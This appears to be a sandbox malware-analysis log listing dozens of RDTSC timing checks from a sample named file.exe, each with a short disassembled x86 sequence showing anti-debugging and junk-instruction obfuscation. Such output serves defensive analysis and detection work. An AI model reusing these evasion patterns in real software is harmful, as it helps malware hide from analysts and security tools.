Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B1364 second address: 13B136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B2A2C second address: 13B2A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B2A3D second address: 13B2A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C405 second address: 136C419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C419 second address: 136C430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD323h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C430 second address: 136C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C445 second address: 136C457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0F04CBD316h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136C457 second address: 136C4B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F0527E406h 0x00000008 jp 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F0F0527E412h 0x00000016 jmp 00007F0F0527E413h 0x0000001b pop ebx 0x0000001c jmp 00007F0F0527E40Fh 0x00000021 pushad 0x00000022 jmp 00007F0F0527E40Fh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4BA4 second address: 13B4BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4BA8 second address: 13B4BAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B70AF second address: 13B70C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD31Dh 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B70C5 second address: 13B70CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B70CB second address: 13B70D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BA9B3 second address: 13BA9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0F0527E406h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BA9C5 second address: 13BA9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BAF34 second address: 13BAF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BAF38 second address: 13BAF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BAF3C second address: 13BAF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BAF42 second address: 13BAFD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0F04CBD318h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jl 00007F0F04CBD31Ch 0x0000002c mov edi, dword ptr [ebp+122D39E0h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F0F04CBD318h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e add bx, 372Fh 0x00000053 pushad 0x00000054 mov edi, dword ptr [ebp+122D2378h] 0x0000005a mov eax, dword ptr [ebp+122D57FBh] 0x00000060 popad 0x00000061 push 00000000h 0x00000063 push ecx 0x00000064 push esi 0x00000065 mov dword ptr [ebp+1248114Dh], esi 0x0000006b pop ebx 0x0000006c pop edi 0x0000006d push eax 0x0000006e je 00007F0F04CBD324h 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BBF4A second address: 13BBF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0F0527E408h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 movzx ebx, dx 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D2598h], ebx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0F0527E412h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BC142 second address: 13BC200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD323h 0x0000000b popad 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D3A40h] 0x00000013 jmp 00007F0F04CBD320h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f cld 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F0F04CBD318h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0D85h] 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F0F04CBD318h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 jmp 00007F0F04CBD329h 0x00000066 sub ebx, dword ptr [ebp+122D1C8Bh] 0x0000006c push FFFFFFFFh 0x0000006e xor ebx, 4996BBB4h 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F0F04CBD31Eh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BD01A second address: 13BD0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 jmp 00007F0F0527E417h 0x0000000e nop 0x0000000f sbb edi, 2FF08F2Ah 0x00000015 push dword ptr fs:[00000000h] 0x0000001c cmc 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 sub dword ptr [ebp+1248D1F9h], ecx 0x0000002a mov eax, dword ptr [ebp+122D0E91h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0F0527E408h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D1F76h] 0x00000050 xor dword ptr [ebp+122D2AA3h], edi 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push edx 0x0000005b call 00007F0F0527E408h 0x00000060 pop edx 0x00000061 mov dword ptr [esp+04h], edx 0x00000065 add dword ptr [esp+04h], 00000019h 0x0000006d inc edx 0x0000006e push edx 0x0000006f ret 0x00000070 pop edx 0x00000071 ret 0x00000072 movsx ebx, si 0x00000075 push eax 0x00000076 jp 00007F0F0527E424h 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BEF79 second address: 13BEF7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BEF7D second address: 13BEFBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E40Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F0F0527E40Ch 0x00000013 jnp 00007F0F0527E406h 0x00000019 jmp 00007F0F0527E419h 0x0000001e push ecx 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF78E second address: 13BF7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD328h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F04CBD323h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF7C0 second address: 13BF7CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF7CD second address: 13BF7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1689 second address: 13C16A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13BF7D1 second address: 13BF7DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C26E9 second address: 13C26F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C17EB second address: 13C17F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C17F1 second address: 13C17F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C18F8 second address: 13C1902 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1902 second address: 13C1908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1908 second address: 13C190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C29CD second address: 13C29D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C7694 second address: 13C76A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0F04CBD31Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C76A9 second address: 13C76AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C76AD second address: 13C76C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F04CBD322h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C76C9 second address: 13C771B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E417h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push esi 0x0000000b and edi, 4DA04C99h 0x00000011 pop ebx 0x00000012 push 00000000h 0x00000014 jo 00007F0F0527E407h 0x0000001a cmc 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F0F0527E408h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C8816 second address: 13C881A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C881A second address: 13C881E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C984E second address: 13C98C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e call 00007F0F04CBD323h 0x00000013 mov dword ptr [ebp+122D30E4h], eax 0x00000019 pop edi 0x0000001a mov dword ptr [ebp+122D1A47h], edi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F0F04CBD318h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c pushad 0x0000003d cld 0x0000003e mov ecx, edx 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 jl 00007F0F04CBD320h 0x00000048 pushad 0x00000049 jl 00007F0F04CBD316h 0x0000004f push ecx 0x00000050 pop ecx 0x00000051 popad 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C98C8 second address: 13C98CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C98CE second address: 13C98DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F0F04CBD316h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CA9C2 second address: 13CA9C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CA9C6 second address: 13CAA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD31Ah 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0F04CBD318h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 sbb bx, BCB7h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a jns 00007F0F04CBD317h 0x00000050 mov dword ptr [ebp+122D1F36h], eax 0x00000056 push 00000000h 0x00000058 mov dword ptr [ebp+12480687h], eax 0x0000005e xchg eax, esi 0x0000005f jmp 00007F0F04CBD325h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CAA53 second address: 13CAA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBBBF second address: 13CBBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBBC3 second address: 13CBC5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007F0F0527E411h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F0F0527E408h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007F0F0527E411h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D2196h], edx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F0F0527E408h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov bx, di 0x00000055 mov dword ptr [ebp+122D2BC5h], esi 0x0000005b xchg eax, esi 0x0000005c jmp 00007F0F0527E413h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jp 00007F0F0527E406h 0x0000006b pushad 0x0000006c popad 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C89A4 second address: 13C89A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C89A9 second address: 13C89CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E416h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C89CD second address: 13C89D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C89D1 second address: 13C89D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C48C0 second address: 13C48CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C48CA second address: 13C4929 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F0F0527E40Ah 0x00000011 push dword ptr fs:[00000000h] 0x00000018 add dword ptr [ebp+1248114Dh], edi 0x0000001e mov bl, F2h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 movsx ebx, di 0x0000002a mov eax, dword ptr [ebp+122D0EBDh] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F0F0527E408h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a push FFFFFFFFh 0x0000004c movzx edi, dx 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 pop edi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C4929 second address: 13C492F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CBE5C second address: 13CBE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2588 second address: 13D25A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D25A3 second address: 13D25A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D25A9 second address: 13D25B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D25B2 second address: 13D25B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D25B8 second address: 13D25BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2724 second address: 13D2729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D28B8 second address: 13D28C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F04CBD316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D28C2 second address: 13D28D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007F0F0527E406h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2A28 second address: 13D2A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2A2E second address: 13D2A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B5E70 second address: 13B5E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D77EC second address: 13D77F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D77F0 second address: 13D77F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D78C0 second address: 13D78C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D78C4 second address: 13D78E7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jbe 00007F0F04CBD31Ch 0x00000013 ja 00007F0F04CBD316h 0x00000019 pop ebx 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D78E7 second address: 13D78EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
